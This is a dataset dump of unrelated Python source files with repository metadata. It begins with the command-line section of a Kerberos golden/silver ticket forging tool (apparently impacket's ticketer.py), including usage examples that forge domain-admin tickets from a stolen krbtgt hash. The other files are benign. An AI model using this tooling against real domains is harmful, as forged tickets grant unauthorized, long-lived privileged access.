ticket, cipher, sessionKey = self.signEncryptTicket(ticket, encASorTGSRepPart, encTicketPart, pacInfos)
self.saveTicket(ticket, sessionKey)
if __name__ == '__main__':
print(version.BANNER)
    parser = argparse.ArgumentParser(add_help=True, description="Creates Kerberos golden/silver tickets based on "
"user options")
parser.add_argument('target', action='store', help='username for the newly created ticket')
parser.add_argument('-spn', action="store", help='SPN (service/server) of the target service the silver ticket will'
                        ' be generated for. If omitted, a golden ticket will be created')
parser.add_argument('-request', action='store_true', default=False, help='Requests ticket to domain and clones it '
'changing only the supplied information. It requires specifying -user')
parser.add_argument('-domain', action='store', required=True, help='the fully qualified domain name (e.g. contoso.com)')
    parser.add_argument('-domain-sid', action='store', required=True, help='Domain SID of the target domain the ticket will be '
'generated for')
parser.add_argument('-aesKey', action="store", metavar = "hex key", help='AES key used for signing the ticket '
'(128 or 256 bits)')
parser.add_argument('-nthash', action="store", help='NT hash used for signing the ticket')
parser.add_argument('-keytab', action="store", help='Read keys for SPN from keytab file (silver ticket only)')
parser.add_argument('-groups', action="store", default = '513, 512, 520, 518, 519', help='comma separated list of '
'groups user will belong to (default = 513, 512, 520, 518, 519)')
parser.add_argument('-user-id', action="store", default = '500', help='user id for the user the ticket will be '
'created for (default = 500)')
parser.add_argument('-extra-sid', action="store", help='Comma separated list of ExtraSids to be included inside the ticket\'s PAC')
parser.add_argument('-duration', action="store", default = '3650', help='Amount of days till the ticket expires '
'(default = 365*10)')
parser.add_argument('-ts', action='store_true', help='Adds timestamp to every logging output')
parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')
group = parser.add_argument_group('authentication')
group.add_argument('-user', action="store", help='domain/username to be used if -request is chosen (it can be '
                       'different from domain/username)')
group.add_argument('-password', action="store", help='password for domain/username')
group.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH')
group.add_argument('-dc-ip', action='store',metavar = "ip address", help='IP Address of the domain controller. If '
                       'omitted it will use the domain part (FQDN) specified in the target parameter')
if len(sys.argv)==1:
parser.print_help()
print("\nExamples: ")
print("\t./ticketer.py -nthash <krbtgt/service nthash> -domain-sid <your domain SID> -domain <your domain FQDN> baduser\n")
print("\twill create and save a golden ticket for user 'baduser' that will be all encrypted/signed used RC4.")
print("\tIf you specify -aesKey instead of -ntHash everything will be encrypted using AES128 or AES256")
print("\t(depending on the key specified). No traffic is generated against the KDC. Ticket will be saved as")
print("\tbaduser.ccache.\n")
print("\t./ticketer.py -nthash <krbtgt/service nthash> -aesKey <krbtgt/service AES> -domain-sid <your domain SID> -domain "
"<your domain FQDN> -request -user <a valid domain user> -password <valid domain user's password> baduser\n")
print("\twill first authenticate against the KDC (using -user/-password) and get a TGT that will be used")
print("\tas template for customization. Whatever encryption algorithms used on that ticket will be honored,")
print("\thence you might need to specify both -nthash and -aesKey data. Ticket will be generated for 'baduser'")
print("\tand saved as baduser.ccache")
sys.exit(1)
options = parser.parse_args()
# Init the example's logger theme
logger.init(options.ts)
if options.debug is True:
logging.getLogger().setLevel(logging.DEBUG)
# Print the Library's installation path
logging.debug(version.getInstallationPath())
else:
logging.getLogger().setLevel(logging.INFO)
if options.domain is None:
logging.critical('Domain should be specified!')
sys.exit(1)
if options.aesKey is None and options.nthash is None and options.keytab is None:
logging.error('You have to specify either aesKey, or nthash, or keytab')
sys.exit(1)
if options.aesKey is not None and options.nthash is not None and options.request is False:
logging.error('You cannot specify both -aesKey and -nthash w/o using -request. Pick only one')
sys.exit(1)
if options.request is True and options.user is None:
logging.error('-request parameter needs -user to be specified')
sys.exit(1)
if options.request is True and options.hashes is None and options.password is None:
from getpass import getpass
password = getpass("Password:")
else:
password = options.password
try:
executer = TICKETER(options.target, password, options.domain, options)
executer.run()
except Exception as e:
if logging.getLogger().level == logging.DEBUG:
import traceback
traceback.print_exc()
print(str(e))
| 52.053856 | 141 | 0.643882 |
29e974af201dcee8b38bb970fb7ac08a747999f9 | 794 | py | Python | head_detection/data/anchors.py | eplatero97/HeadHunter | f72ef06263a530102b3de1894f94d65255aecb37 | [
"MIT"
] | 60 | 2021-06-20T06:17:30.000Z | 2022-03-30T03:04:48.000Z | head_detection/data/anchors.py | eplatero97/HeadHunter | f72ef06263a530102b3de1894f94d65255aecb37 | [
"MIT"
] | 21 | 2021-06-21T09:39:27.000Z | 2022-02-07T22:41:43.000Z | head_detection/data/anchors.py | eplatero97/HeadHunter | f72ef06263a530102b3de1894f94d65255aecb37 | [
"MIT"
] | 16 | 2021-06-22T03:07:06.000Z | 2022-01-18T16:52:05.000Z | #!/usr/bin/env python
# coding: utf-8
shead_anchors = ((18,), (36,), (72,),
(128,), (208,), (320,),
(512,), (768,))
chuman_anchors = ((10,), (48,), (128,), (192,), (256,), (320,), (512,))
comb_anchors = ((12,), (32,), (64,), (112,), (196, ), (256,), (384,), (512,))
hh_anchors = ((12,), (18,), (24,), (32,), (48, ), (64,), (128,))
sh_anchors = {'anchor_sizes' : shead_anchors,
'aspect_ratios' : ((0.5, 1.0, 1.5),) * len(shead_anchors)}
ch_anchors = {'anchor_sizes' : chuman_anchors,
'aspect_ratios' : ((0.5, 1.0, 2.0),) * len(chuman_anchors)}
combined_anchors = {'anchor_sizes' : comb_anchors,
'aspect_ratios' : ((0.5, 1.0, 1.5),) * len(comb_anchors)}
headhunt_anchors = {'anchor_sizes' : hh_anchors,
'aspect_ratios' : ((0.5, 1.0, 1.5),) * len(hh_anchors)} | 34.521739 | 77 | 0.549118 |
d4837cacfc1bff3a5e939855ed791222efe603da | 5,411 | py | Python | tests/test_dblib.py | locriandev/doozer | 375eafccc15aadfd18dc50061eccb9a917d31b0b | [
"Apache-2.0"
] | 16 | 2018-11-06T16:49:03.000Z | 2021-11-07T19:48:49.000Z | tests/test_dblib.py | locriandev/doozer | 375eafccc15aadfd18dc50061eccb9a917d31b0b | [
"Apache-2.0"
] | 479 | 2018-11-15T15:37:49.000Z | 2022-03-31T08:39:44.000Z | tests/test_dblib.py | locriandev/doozer | 375eafccc15aadfd18dc50061eccb9a917d31b0b | [
"Apache-2.0"
] | 38 | 2018-11-07T14:33:15.000Z | 2021-12-13T13:59:12.000Z | import unittest
from doozerlib.dblib import DB, Record
from multiprocessing import RLock, Lock, Semaphore
import logging
import datetime
import pathlib
import traceback
import sys
import mock
class FakeMetaData(object):
def __init__(self):
self.name = "test"
self.namespace = "test_namespace"
self.qualified_key = "test_qualified_key"
self.qualified_name = "test_qualified_name"
class FakeRuntime(object):
"""This is a fake runtime class to inject into dblib running tests."""
mutex = RLock()
def __init__(self):
self.logger = logging.getLogger(__name__)
# Create a "uuid" which will be used in FROM fields during updates
self.uuid = datetime.datetime.now().strftime("%Y%m%d.%H%M%S")
self.user = ""
self.group_config = dict()
self.group_config["name"] = "test"
# Cooperative threads can request exclusive access to directories.
# This is usually only necessary if two threads want to make modifications
# to the same global source alias. The empty string key serves as a lock for the
# data structure.
self.dir_locks = {'': Lock()}
# See get_named_semaphore. The empty string key serves as a lock for the data structure.
self.named_semaphores = {'': Lock()}
def get_named_lock(self, absolute_path):
with self.dir_locks['']:
p = pathlib.Path(absolute_path).absolute() # normalize (e.g. strip trailing /)
if p in self.dir_locks:
return self.dir_locks[p]
else:
new_lock = Lock()
self.dir_locks[p] = new_lock
return new_lock
def get_named_semaphore(self, lock_name, is_dir=False, count=1):
"""
Returns a semaphore (which can be used as a context manager). The first time a lock_name
is received, a new semaphore will be established. Subsequent uses of that lock_name will
receive the same semaphore.
:param lock_name: A unique name for resource threads are contending over. If using a directory name
as a lock_name, provide an absolute path.
:param is_dir: The lock_name is a directory (method will ignore things like trailing slashes)
:param count: The number of times the lock can be claimed. Default=1, which is a full mutex.
:return: A semaphore associated with the lock_name.
"""
with self.named_semaphores['']:
if is_dir:
p = '_dir::' + str(pathlib.Path(str(lock_name)).absolute()) # normalize (e.g. strip trailing /)
else:
p = lock_name
if p in self.named_semaphores:
return self.named_semaphores[p]
else:
new_semaphore = Semaphore(count)
self.named_semaphores[p] = new_semaphore
return new_semaphore
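    # Rough usage sketch for the helper above (not exercised by these tests; the
    # path below is hypothetical): a cooperating thread would serialize access to
    # a shared resource with something like
    #
    #   sem = fake_runtime.get_named_semaphore('/some/shared/dir', is_dir=True)
    #   with sem:
    #       pass  # at most `count` threads run this block at the same time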
@staticmethod
def timestamp():
return datetime.datetime.utcnow().isoformat()
class DBLibTest(unittest.TestCase):
def setUp(self):
self.setup_failed = False
try:
self.fake_runtime = FakeRuntime()
self.db = DB(runtime=self.fake_runtime, environment="test")
except Exception:
traceback.print_exc()
self.setup_failed = True
def test_select_withoutenv(self):
if not self.setup_failed:
self.assertEqual(len(self.db.select("select * from test", 10)), 0)
def test_record(self):
if not self.setup_failed:
try:
with self.db.record(operation="build", metadata=None):
Record.set("name", "test")
Record.set("position", "record")
with self.db.record(operation="build", metadata=None):
Record.set("name", "test2")
Record.set("position", "record2")
Record.set("position2", "r_record2")
except Exception:
self.fail(msg="Failed to record.")
else:
self.skipTest(reason="DB setup failed for running test.")
def test_record_with_metadata(self):
if not self.setup_failed:
try:
with self.db.record(operation="build", metadata=FakeMetaData()):
Record.set("name", "test")
Record.set("position", "record")
Record.set("country", "USA")
Record.set("population", 45435432523)
except Exception:
self.fail(msg="Failed to create record with extras.")
else:
self.skipTest(reason="DB setup failed for running test.")
def test_record_with_empty_value(self):
if not self.setup_failed:
try:
with self.db.record(operation='build', metadata=None):
Record.set("name", "test")
Record.set("position", None)
Record.set("country", "")
Record.set("population", 0)
except Exception:
self.fail(msg="Failed to create record with missing attribute value.")
else:
self.skipTest(reason="DB setup failed for running test.")
def tearDown(self):
pass
if __name__ == "__main__":
logging.basicConfig(stream=sys.stdout)
unittest.main()
| 35.598684 | 112 | 0.592682 |
4abd04b3f188f7f0c8e38cb8fdf5d6f743626599 | 394 | py | Python | neurodsp/plts/__init__.py | elybrand/neurodsp | 96355f4c75e1eedef2a77a8bfafc718f80b8dae3 | [
"Apache-2.0"
] | null | null | null | neurodsp/plts/__init__.py | elybrand/neurodsp | 96355f4c75e1eedef2a77a8bfafc718f80b8dae3 | [
"Apache-2.0"
] | null | null | null | neurodsp/plts/__init__.py | elybrand/neurodsp | 96355f4c75e1eedef2a77a8bfafc718f80b8dae3 | [
"Apache-2.0"
] | null | null | null | """Plotting functions."""
from .time_series import plot_time_series, plot_bursts, plot_instantaneous_measure
from .filt import plot_filter_properties, plot_frequency_response, plot_impulse_response
from .rhythm import plot_swm_pattern, plot_lagged_coherence
from .spectral import (plot_power_spectra, plot_spectral_hist,
plot_scv, plot_scv_rs_lines, plot_scv_rs_matrix)
| 49.25 | 88 | 0.814721 |
2513075704ca69a5b4da09cad0785566130d8fc4 | 9,554 | py | Python | aiida_kkr/parsers/kkr.py | markusstruckmann/aiida-kkr | 5ce20a61a667787aeb68fa0c8b81e73aa3cf94a5 | [
"MIT"
] | 6 | 2018-11-16T10:44:06.000Z | 2021-02-09T15:38:51.000Z | aiida_kkr/parsers/kkr.py | RubelMozumder/aiida-kkr | 1db3d57626c27f2a7105d587dfb8543269ce6c00 | [
"MIT"
] | 63 | 2018-11-27T10:43:49.000Z | 2022-02-10T11:10:16.000Z | aiida_kkr/parsers/kkr.py | RubelMozumder/aiida-kkr | 1db3d57626c27f2a7105d587dfb8543269ce6c00 | [
"MIT"
] | 9 | 2018-11-09T09:52:16.000Z | 2021-12-10T18:09:11.000Z | # -*- coding: utf-8 -*-
"""
Parser for the KKR Code.
The parser should never fail, but it should catch
all errors and warnings and show them to the user.
"""
from __future__ import absolute_import
from aiida.parsers.parser import Parser
from aiida.orm import Dict
from aiida_kkr.calculations.kkr import KkrCalculation
from aiida.common.exceptions import InputValidationError
from aiida.common import exceptions
from masci_tools.io.parsers.kkrparser_functions import parse_kkr_outputfile, check_error_category
from masci_tools.io.common_functions import search_string
__copyright__ = (u"Copyright (c), 2017, Forschungszentrum Jülich GmbH, "
"IAS-1/PGI-1, Germany. All rights reserved.")
__license__ = "MIT license, see LICENSE.txt file"
__version__ = "0.6.3"
__contributors__ = ("Jens Broeder", u"Philipp Rüßmann")
class KkrParser(Parser):
"""
Parser class for parsing output of KKR code..
"""
def __init__(self, calc):
"""
Initialize the instance of KkrParser
"""
# needed for KKRimporter parser
self.icrit = 0
self._ParserVersion = __version__
#reuse init of base class
super(KkrParser, self).__init__(calc)
# pylint: disable=protected-access
def parse(self, **kwargs):
"""
Parse output data folder, store results in database.
:param retrieved: a dictionary of retrieved nodes, where
the key is the link name
:returns: a tuple with two values ``(bool, node_list)``,
where:
* ``bool``: variable to tell if the parsing succeeded
* ``node_list``: list of new nodes to be stored in the db
(as a list of tuples ``(link_name, node)``)
"""
success = False
node_list = ()
# Get retrieved folders
try:
out_folder = self.retrieved
except exceptions.NotExistent:
return self.exit_codes.ERROR_NO_RETRIEVED_FOLDER
# check what is inside the folder
list_of_files = out_folder._repository.list_object_names()
# we need at least the output file name as defined in calcs.py
if KkrCalculation._DEFAULT_OUTPUT_FILE not in list_of_files:
msg = "Output file '{}' not found in list of files: {}".format(KkrCalculation._DEFAULT_OUTPUT_FILE, list_of_files)
if self.icrit==0: # this check turns this off for the KKRimporter calculation
self.logger.error(msg)
return self.exit_codes.ERROR_NO_OUTPUT_FILE
# determine whether or not everything should be parsed or not (e.g. qdos option)
skip_mode = False
only_000_present = False
with out_folder.open(KkrCalculation._INPUT_FILE_NAME) as file:
txt = file.readlines()
itmp = search_string('RUNOPT', txt)
if itmp>=0:
runopts = txt[itmp+1]
if 'qdos' in runopts:
skip_mode = True
if 'KKRFLEX' in runopts:
only_000_present = True
# now collect the rest of the files
file_errors = []
# Parse output files of KKR calculation
if KkrCalculation._DEFAULT_OUTPUT_FILE in out_folder.list_object_names():
outfile = out_folder.open(KkrCalculation._DEFAULT_OUTPUT_FILE)
else:
file_errors.append((1+self.icrit, msg))
outfile = None
# get path to files and catch errors if files are not present
        # append tuples (error_category, error_message) where error_category is
# 1: critical error, always leads to failing of calculation
# 2: warning, is inspected and checked for consistency with read-in
# out_dict values (e.g. nspin, newsosol, ...)
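        # For illustration (hypothetical messages), file_errors may end up like:
        #   [(1, 'Critical error! OUTPUT_000 not found ...'),
        #    (2, 'Error! NONCO_ANGLES_OUT not found ...')]
        # where the category decides further below whether the message becomes a
        # parser error or only a parser warning.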
fname = KkrCalculation._OUTPUT_0_INIT
if fname in out_folder.list_object_names():
outfile_0init = out_folder.open(fname)
else:
file_errors.append((1+self.icrit, "Critical error! OUTPUT_0_INIT not found {}".format(fname)))
outfile_0init = None
fname = KkrCalculation._OUTPUT_000
if fname in out_folder.list_object_names():
outfile_000 = out_folder.open(fname)
else:
file_errors.append((1+self.icrit, "Critical error! OUTPUT_000 not found {}".format(fname)))
outfile_000 = None
fname = KkrCalculation._OUTPUT_2
if fname in out_folder.list_object_names():
outfile_2 = out_folder.open(fname)
else:
if not only_000_present:
file_errors.append((1+self.icrit, "Critical error! OUTPUT_2 not found {}".format(fname)))
outfile_2 = None
else:
outfile_2 = outfile_000
fname = KkrCalculation._OUT_POTENTIAL
if fname in out_folder.list_object_names():
potfile_out = out_folder.open(fname)
else:
file_errors.append((1+self.icrit, "Critical error! OUT_POTENTIAL not found {}".format(fname)))
potfile_out = None
fname = KkrCalculation._OUT_TIMING_000
if fname in out_folder.list_object_names():
timing_file = out_folder.open(fname)
else:
file_errors.append((1+self.icrit, "Critical error! OUT_TIMING_000 not found {}".format(fname)))
timing_file = None
fname = KkrCalculation._NONCO_ANGLES_OUT
if fname in out_folder.list_object_names():
nonco_out_file = out_folder.open(fname)
else:
file_errors.append((2, "Error! NONCO_ANGLES_OUT not found {}".format(fname)))
nonco_out_file = None
out_dict = {'parser_version': self._ParserVersion,
'calculation_plugin_version': KkrCalculation._CALCULATION_PLUGIN_VERSION}
#TODO job title, compound description
success, msg_list, out_dict = parse_kkr_outputfile(out_dict, outfile,
outfile_0init, outfile_000,
timing_file, potfile_out,
nonco_out_file, outfile_2,
skip_readin=skip_mode)
# try to parse with other combinations of files to minimize parser errors
if self.icrit != 0:
self.logger.info('msg_list0: {}'.format(msg_list))
# try second combination of files
out_dict2 = out_dict.copy()
success2, msg_list2, out_dict2 = parse_kkr_outputfile(out_dict2, outfile_2,
outfile_0init, outfile_000, timing_file, potfile_out, nonco_out_file,
outfile_2, skip_readin=skip_mode)
self.logger.info('msg_list1: {}'.format(msg_list2))
if len(msg_list2)<len(msg_list): # overwrite parser outputs if fewer errors
self.logger.info('take output of parser run 1')
success, msg_list, out_dict = success2, msg_list2, out_dict2
# try third combination of files
out_dict2 = out_dict.copy()
success2, msg_list2, out_dict2 = parse_kkr_outputfile(out_dict2, outfile_000,
outfile_0init, outfile_000, timing_file, potfile_out, nonco_out_file,
outfile_2, skip_readin=skip_mode)
self.logger.info('msg_list2: {}'.format(msg_list2))
if len(msg_list2)<len(msg_list): # overwrite parser outputs if fewer errors
self.logger.info('take output of parser run 2')
success, msg_list, out_dict = success2, msg_list2, out_dict2
out_dict['parser_errors'] = msg_list
# add file open errors to parser output of error messages
for (err_cat, f_err) in file_errors:
if err_cat == 1:
msg_list.append(f_err)
elif check_error_category(err_cat, f_err, out_dict):
msg_list.append(f_err)
else:
if 'parser_warnings' not in list(out_dict.keys()):
out_dict['parser_warnings'] = []
out_dict['parser_warnings'].append(f_err.replace('Error', 'Warning'))
out_dict['parser_errors'] = msg_list
#create output node and link
self.out('output_parameters', Dict(dict=out_dict))
if self.icrit != 0 and not success: # overwrite behavior with KKRimporter
success = True # set automatically to True even if only partial output was parsed
msg = "Automatically returned success=True for KKR importer although some parsing errors occurred"
self.logger.warning(msg)
if not success:
return self.exit_codes.ERROR_KKR_PARSING_FAILED
else: # cleanup after parsing (only if parsing was successful)
# delete completely parsed output files
self.remove_unnecessary_files()
# then (maybe) tar the output to save space
#TODO needs implementing (see kkrimp parser)
def remove_unnecessary_files(self):
"""
Remove files that are not needed anymore after parsing
The information is completely parsed (i.e. in outdict of calculation)
and keeping the file would just be a duplication.
"""
files_to_delete = [KkrCalculation._POTENTIAL,
KkrCalculation._SHAPEFUN]
for fileid in files_to_delete:
if fileid in self.retrieved.list_object_names():
self.retrieved.delete_object(fileid, force=True)
| 44.02765 | 126 | 0.623613 |
84b05d1a7a94cb09f625fa7f7ace2201ac1d0cff | 594 | py | Python | ray_beam_runner/util.py | pabloem/ray_beam_runner | ec884d66067071f44eff7ca4be032474e2261e93 | [
"Apache-2.0"
] | 12 | 2022-01-13T05:58:45.000Z | 2022-03-31T23:05:59.000Z | ray_beam_runner/util.py | pabloem/ray_beam_runner | ec884d66067071f44eff7ca4be032474e2261e93 | [
"Apache-2.0"
] | 7 | 2022-02-23T09:58:54.000Z | 2022-03-29T21:44:53.000Z | ray_beam_runner/util.py | pabloem/ray_beam_runner | ec884d66067071f44eff7ca4be032474e2261e93 | [
"Apache-2.0"
] | 3 | 2022-02-23T04:28:08.000Z | 2022-03-13T19:15:35.000Z | import ray
from apache_beam.pipeline import PipelineVisitor
class PipelinePrinter(PipelineVisitor):
def visit_value(self, value, producer_node):
print(f"visit_value(value, {producer_node.full_label})")
def visit_transform(self, transform_node):
print(f"visit_transform({type(transform_node.transform)})")
def enter_composite_transform(self, transform_node):
print(f"enter_composite_transform({transform_node.full_label})")
def leave_composite_transform(self, transform_node):
print(f"leave_composite_transform({transform_node.full_label})")
| 34.941176 | 72 | 0.765993 |
203f4e693b3cb361ddd7e6c0003d0073a15911b8 | 249 | py | Python | test/gallery/proteinsignal/testChemotaxis.py | jeanqasaur/jeeves | 1b5783a98f88fa2fc9e4cae7e005d2c9242cfea4 | [
"MIT"
] | 253 | 2015-01-02T01:54:27.000Z | 2022-03-10T01:44:02.000Z | test/gallery/proteinsignal/testChemotaxis.py | jeanqasaur/jeeves | 1b5783a98f88fa2fc9e4cae7e005d2c9242cfea4 | [
"MIT"
] | 4 | 2015-06-09T03:36:28.000Z | 2017-08-11T15:54:24.000Z | test/gallery/proteinsignal/testChemotaxis.py | jeanqasaur/jeeves | 1b5783a98f88fa2fc9e4cae7e005d2c9242cfea4 | [
"MIT"
] | 29 | 2015-02-14T02:24:08.000Z | 2021-12-16T02:46:16.000Z | import JeevesLib
from smt.Z3 import *
import unittest
from RSphaeroides import RSphaeroides
import JeevesLib
class TestAuction(unittest.TestCase):
def setUp(self):
JeevesLib.init()
def test_something(self):
r = RSphaeroides()
pass
| 17.785714 | 37 | 0.75502 |
84c0faf62ebb6df665e10c17de64d236f891e58b | 895 | py | Python | examples/bots/bot 1/job.py | Sal0hc1n/crypto-price-api | d5580ca3a0f0267e73927212d8b182a4d2e5db8e | [
"MIT"
] | null | null | null | examples/bots/bot 1/job.py | Sal0hc1n/crypto-price-api | d5580ca3a0f0267e73927212d8b182a4d2e5db8e | [
"MIT"
] | null | null | null | examples/bots/bot 1/job.py | Sal0hc1n/crypto-price-api | d5580ca3a0f0267e73927212d8b182a4d2e5db8e | [
"MIT"
] | null | null | null | from bot.App import bot
from bot import crud
from bot import coin
def user_job(chat_id):
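    # Summary: compare the current coin price with the user's stored value; when
    # the move exceeds the user's `overweight` threshold, store the new value and
    # notify the chat. Independently, alert (and update the stored bound) whenever
    # the price crosses the recorded max_value or min_value.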
user = crud.get_user(chat_id)
new_value = coin.get_current_value()
diff = new_value - user.value
if abs(diff) > user.overweight:
crud.update_value(chat_id, new_value)
prefix = "Up" if diff > 0 else "Down"
body = prefix + ": " + str(new_value) + " | Diff: " + str(int(diff))
bot.send_message(chat_id, body)
if new_value > user.max_value:
body = "Alert! Rose higher: " + str(user.max_value) + " | " + " Current: " + str(new_value)
crud.update_max_value(chat_id, new_value)
bot.send_message(chat_id, body)
if new_value < user.min_value:
body = "Alert! Fell below: " + str(user.min_value) + " | " + " Current: " + str(new_value)
crud.update_min_value(chat_id, new_value)
bot.send_message(chat_id, body)
| 37.291667 | 99 | 0.631285 |
55d21d5afd2aaf91df16908d5df7eecad3784c55 | 3,848 | py | Python | scripts/01_normalize_packages.py | facade-technologies-inc/facile | 4c9134dced71734641fed605e152880cd9ddefe3 | [
"MIT"
] | 2 | 2020-09-17T20:51:18.000Z | 2020-11-03T15:58:10.000Z | scripts/01_normalize_packages.py | facade-technologies-inc/facile | 4c9134dced71734641fed605e152880cd9ddefe3 | [
"MIT"
] | 97 | 2020-08-26T05:07:08.000Z | 2022-03-28T16:01:49.000Z | scripts/01_normalize_packages.py | facade-technologies-inc/facile | 4c9134dced71734641fed605e152880cd9ddefe3 | [
"MIT"
] | null | null | null | import os
import pygit2
import pip
import subprocess
temp_req_file = "temp_requirements.txt"
perm_req_file = "../requirements.txt"
# Mapping of dependencies to download and install from Facade Technologies github
# These are generally repositories that needed to be forked and modified to work with Facile.
requirements_from_source = {
"qtmodern": ("https://github.com/facade-technologies-inc/qtmodern.git", "master"),
"qnotifications": ("https://github.com/facade-technologies-inc/QNotifications", "master"),
}
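# Each value above is a (git_url, branch) tuple: the loop at the bottom of this
# script clones or pulls the repository alongside this checkout and pip-installs
# it from source instead of fetching the package from PyPI.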
if __name__ == "__main__":
# -- Get current list of installed packages. -----------------------------------------------------------------------
os.system(f"pip freeze > {temp_req_file}")
with open(temp_req_file) as f:
cur_reqs = set(f.readlines())
os.remove(temp_req_file)
# -- Get list of necessary requirements ----------------------------------------------------------------------------
with open(perm_req_file) as f:
needed_reqs = set(f.readlines())
# -- Determine which requirements we have, need to get rid of, or need to install. ---------------------------------
unnecessary_packages = [p for p in cur_reqs - needed_reqs if p not in requirements_from_source]
have_packages = cur_reqs.intersection(needed_reqs)
needed_packages = list(needed_reqs - cur_reqs)
# -- Uninstall unnecessary packages --------------------------------------------------------------------------------
for package in unnecessary_packages:
print(f"Uninstalling {package}")
os.system(f"pip uninstall -y {package} 1>nul 2>&1")
# -- Install all required dependencies (if not installing from source) ---------------------------------------------
for package in needed_packages:
stripped_package = package.replace("="," ").replace(">", " ").replace("<", " ").split()[0].lower()
if stripped_package not in requirements_from_source:
os.system(f"pip install --no-deps {package} 1>nul 2>&1")
# -- Clone/Pull any dependencies which are not hosted on PyPi) -----------------------------------------------------
for package, repo in requirements_from_source.items():
url, branchName = repo
repo_path = os.path.normpath(os.path.join(os.path.dirname(__file__), "../../", package))
# if the repo already exists, switch to the target branch and pull
if os.path.exists(repo_path):
print('')
print(f"Pulling: {package} @ branch: {branchName}")
repoObj = pygit2.Repository(os.path.join(repo_path, ".git"))
branch = repoObj.lookup_branch(branchName)
ref = repoObj.lookup_reference(branch.name)
repoObj.checkout(ref)
freeze_loc = os.getcwd()
os.chdir(repo_path)
output = subprocess.check_output(["git", "pull"])
os.chdir(freeze_loc)
else:
print(f"Cloning: {package} @ branch: {branchName}")
pygit2.clone_repository(url, repo_path, checkout_branch=branchName)
print(f"Installing from source: {package}")
pip.main(["install", repo_path])
print('')
# -- Print a report of what was done -------------------------------------------------------------------------------
report = {
"These are extra (we uninstalled them for you)": unnecessary_packages,
"You have these required packages already (no action)": have_packages,
"You need these packages (we installed them for you)": needed_packages,
"We also pulled the following packages from github": requirements_from_source.keys()
}
for x, l in report.items():
l = '\t'.join(l).rstrip() if l != [] else None
print("\n{x}:\n\t{l}".format(x=x, l=l))
print() # extra whitespace to look good
| 44.744186 | 120 | 0.577183 |
528081bc1135c81bfd23288211c3cf7d0eb0fd4e | 1,002 | py | Python | setup.py | choi-jiwoo/pyrich | 21f2b2196803ea18d50f904b90a0d7598c183345 | [
"MIT"
] | null | null | null | setup.py | choi-jiwoo/pyrich | 21f2b2196803ea18d50f904b90a0d7598c183345 | [
"MIT"
] | null | null | null | setup.py | choi-jiwoo/pyrich | 21f2b2196803ea18d50f904b90a0d7598c183345 | [
"MIT"
] | null | null | null | from setuptools import setup
from setuptools import find_packages
from pyrich import __version__ as VERSION
description = 'My own portfolio management service'
project_urls = {
'Source': 'https://github.com/choi-jiwoo/pyrich',
}
with open('README.md', 'r') as f:
long_description = f.read()
install_requires = [
]
setup(
name='pyrich',
version=VERSION,
author='Choi Ji Woo',
author_email='cho2.jiwoo@gmail.com',
description=description,
long_description=long_description,
long_description_content_type='text/markdown',
packages=find_packages(),
install_requires=install_requires,
license='MIT',
project_urls=project_urls,
classifiers=[
'Development Status :: 3 - Alpha',
'Intended Audience :: Education',
'Programming Language :: Python :: 3',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
],
entry_points={'console_scripts': ['pyrich=pyrich.control:run']},
)
| 27.081081 | 68 | 0.683633 |
4a47c90da60ee9161a7cf362717cad63521c60a4 | 2,602 | py | Python | nt-worker/Analysis/AnalysisTitle.py | KPFBERT/Newstrust | db1ca6454ce9f421f9c4006f8cd00bade06b17b5 | [
"MIT"
] | 1 | 2022-02-25T02:35:09.000Z | 2022-02-25T02:35:09.000Z | nt-worker/Analysis/AnalysisTitle.py | KPFBERT/Newstrust | db1ca6454ce9f421f9c4006f8cd00bade06b17b5 | [
"MIT"
] | null | null | null | nt-worker/Analysis/AnalysisTitle.py | KPFBERT/Newstrust | db1ca6454ce9f421f9c4006f8cd00bade06b17b5 | [
"MIT"
] | null | null | null | # from eunjeon import Mecab
from konlpy.tag import Mecab
class AnalysisTitle(object):
def __init__(self, inputTitle):
        self.TitleText = self.preProcessTitle(inputTitle) # title text
        self.TitleMecabTag = self.getMecabTag() # Mecab POS tags for the title
        self.TitleLen = self.getTitleLen() # title length
        self.QuestionMarkCount = self.getQuestionMarkCount() # number of question marks in the title
        self.ExclamationMarkCount = self.getExclamationMarkCount() # number of exclamation marks in the title
        self.TitleAdverbsCount = self.getTitleAdverbsNum() # number of adverbs in the title
        self.TitleDoubleQuotationsMarksNum = self.getTitleDoubleQuotationsMarksNum() # number of double quotation marks in the title
def preProcessTitle(self, title):
value = title.replace("\n\n", "\n")
value = value.replace('‘', '\'', -1)
value = value.replace('’', '\'', -1)
value = value.replace('“', '\"', -1)
value = value.replace('”', '\"', -1)
return value
def getMecabTag(self):
mecab = Mecab()
# mecab = MeCab.Tagger()
mecabTag = mecab.pos(self.TitleText)
# mecabTag = mecab.parse(self.TitleText)
return mecabTag
def getTitleLen(self):
TitleLen = len(self.TitleText)
return TitleLen
def getQuestionMarkCount(self):
count = 0
for val in self.TitleMecabTag:
if 'SF' in val[1]:
if '?' == val[0]:
count += 1
return count
def getExclamationMarkCount(self):
count = 0
for val in self.TitleMecabTag:
if 'SF' in val[1]:
if '!' == val[0]:
count += 1
return count
def getTitleAdverbsNum(self):
count = 0
for val in self.TitleMecabTag:
if 'MAG' in val[1] or 'MAJ' in val[1]:
count += 1
return count
def getTitleDoubleQuotationsMarksNum(self):
count = 0
for val in self.TitleMecabTag:
if 'SY' in val[1]:
if '"' in val[0]:
count += 1
return count
def PrintMyValue(self):
print('----------print Analysis Title----------')
print('TitleText : ', self.TitleText)
print('TitleMecabTag : ', self.TitleMecabTag)
print('TitleLen : ', self.TitleLen)
print('QuestionMarkCount : ', self.QuestionMarkCount)
print('ExclamationMarkCount : ', self.ExclamationMarkCount)
print('TitleAdverbsCount : ', self.TitleAdverbsCount)
print('TitleDoubleQuotationsMarksNum : ', self.TitleDoubleQuotationsMarksNum)
print('----------End Analysis Title----------') | 35.643836 | 97 | 0.574942 |
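# --- Hedged usage sketch (not part of the original file) ---
# The class only needs a headline string; every statistic is computed in __init__. Exact
# counts depend on the installed Mecab dictionary, so the sample title below is illustrative.
if __name__ == "__main__":
    sample = AnalysisTitle('"경제가 살아난다"... 정말일까?')
    sample.PrintMyValue()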
3b2c87e59df9b6f4ef1a87ea5abf99d3a8fffb94 | 687 | py | Python | eka/classes/builders/jinja.py | viswanc/eka | edb0aa373f74ec297d0e35e9cd6d564264322698 | [
"MIT"
